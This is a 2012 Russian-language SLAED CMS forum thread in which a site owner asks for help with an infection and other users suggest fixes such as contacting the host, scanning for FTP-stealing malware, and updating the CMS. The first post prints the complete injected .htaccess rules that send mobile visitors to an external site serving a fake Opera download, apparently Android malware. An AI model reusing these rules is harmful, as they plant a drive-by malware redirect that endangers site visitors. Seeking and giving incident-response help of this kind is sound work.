Открыть Ответить

Какой то вирус, помогите разобраться...

0.00

0.00

1
03.08.2012 00:00:51 03.08.2012 00:44:25

В общем, суть в том, что на сайт нельзя зайти с мобильного устройства, сразу идет перенаправление на левый сайт, где предлагается якобы скачать новую версию оперы, на деле же - какое то приложение (для android), вероятно ворующее деньги со счета (благо у меня планшет, так что вирус после инсталляции себя никак не смог проявить). вот код, автоматически прописанный во все .htaccess файлы. уничтожить простым способом нельзя - тут же появляется опять... вот как раз где у него "ядро" - найти пока не могу...
заражены все сайты на аккаунте.
index.php сайтов не содержат подозрительного кода.
смена паролей каких-либо, не спасает.

<br /> <br /> RewriteEngine on<br /> <br /> RewriteCond %{HTTP_ACCEPT} "text/vnd.wap.wml|application/vnd.wap.xhtml+xml" [NC,OR]<br /> <br /> RewriteCond %{HTTP_USER_AGENT} "acs|alav|alca|amoi|audi|aste|avan|benq|bird|blac|blaz|brew|cell|cldc|cmd-" [NC,OR]<br /> <br /> RewriteCond %{HTTP_USER_AGENT} "dang|doco|eric|hipt|inno|ipaq|java|jigs|kddi|keji|leno|lg-c|lg-d|lg-g|lge-" [NC,OR] <br /> <br /> RewriteCond %{HTTP_USER_AGENT} "maui|maxo|midp|mits|mmef|mobi|mot-|moto|mwbp|nec-|newt|noki|opwv" [NC,OR]<br /> <br /> RewriteCond %{HTTP_USER_AGENT} "palm|pana|pant|pdxg|phil|play|pluc|port|prox|qtek|qwap|sage|sams|sany" [NC,OR]<br /> <br /> RewriteCond %{HTTP_USER_AGENT} "sch-|sec-|send|seri|sgh-|shar|sie-|siem|smal|smar|sony|sph-|symb|t-mo" [NC,OR]<br /> <br /> RewriteCond %{HTTP_USER_AGENT} "teli|tim-|tosh|tsm-|upg1|upsi|vk-v|voda|w3cs|wap-|wapa|wapi" [NC,OR]<br /> <br /> RewriteCond %{HTTP_USER_AGENT} "wapp|wapr|webc|winw|winw|xda|xda-" [NC,OR]<br /> <br /> RewriteCond %{HTTP_USER_AGENT} "up.browser|up.link|windowssce|iemobile|mini|mmp" [NC,OR]<br /> <br /> RewriteCond %{HTTP_USER_AGENT} "symbian|midp|wap|phone|pocket|mobile|pda|psp|PPC|Android" [NC]<br /> <br /> RewriteCond %{HTTP_USER_AGENT} !macintosh [NC] <br /> <br /> RewriteCond %{HTTP_USER_AGENT} !america [NC]<br /> <br /> RewriteCond %{HTTP_USER_AGENT} !avant [NC]<br /> <br /> RewriteCond %{HTTP_USER_AGENT} !iphone [NC]<br /> <br /> RewriteCond %{HTTP_USER_AGENT} !download [NC]<br /> <br /> RewriteCond %{HTTP_USER_AGENT} !windows-media-player [NC]<br /> <br /> RewriteRule ^(.*)$ http://gofdoor.01g.info/blog/post.php&#063;sid=24 [L,R=302]<br /> <br /> ###IDI_KURI_KRAPIVU###<br /> <br />

SLAED CMS 2.6 Lite
PHP 5
Сервер в интернете
Группа
Посетители
Пункты
729
Регистрация
07.10.2006
Пол
Мужчина
Из
Россия/Москва
Предупреждения
Нет
Goshan
Goshan
3.92

3.92

03.08.2012 13:06:18 03.08.2012 14:15:32

Вариантов может быть несколько.

  1. Уязвимость на стороне хостера, устаревшее программное обеспечения, неправильные настройки и прочее.

Решение: Обратится с вышеописанной проблемой к хостеру.


2. Уязвимость на стороне Вашего компьютера. Как правила заражение вирусом, который производит замену файлов на сервере по средствам ФТП от Вашего имени.

Решение: Проверить компьютер антивирусами и прочими таблетками.


3. Уязвимость системы. Обратите внимание что версия SLAED CMS 2.6 Lite и её дальнейшая разработка к сожалению уже давно не поддерживается.

1. Решение: [url=http://www.slaed.net/forum-view-11548.html]http://www.slaed.net/forum-view-11548.html[/url]
а. Отключить поиск.
б. Если установлен, удалить Spaw 2 Редактор
в. Если используются сторонние разработки, возможны уязвимости в них.
г. Далее, обновить все файлы системы.

2. Решение: Перейти на актуальную версию SLAED CMS 5.1 Pro (Существует анализатор всех действий на сайте, который предназначен для решения и выявления подобных проблем) или Open SLAED 1.3

О сколько нам открытий чудных,
Готовит просвещенья дух,
И опыт, сын ошибок трудных,
И гений, парадоксов друг...
Группа
Клиент
Пункты
39468
Регистрация
30.04.2005
Пол
Мужчина
Из
Germany
Предупреждения
Нет
SLAED CMS
SLAED CMS
3.24

3.24

04.08.2012 07:41:18

Вот немного полезной инфы по этому делу
http://webmaster.ya.ru/replies.xml?item_no=12778

я как то другой вирус хватал удалял таким способом.

еще такая инфа

Удалил вирус(удалил вредоносный код с htaccess). Поменял права доступа на 664 зашел в панель хостинга. Удалил всех пользователей ftp, создал нового + пароли, потом мониторил.

Группа
Клиент
Пункты
196
Регистрация
28.02.2012
Пол
Мужчина
Предупреждения
Нет
Marsianin
Marsianin
4.60

4.60

Открыть Ответить
Хотите опробовать SLAED CMS в действии?
Идеи и предложения
Обратная связь
Подтверждение

Поделиться
QR-код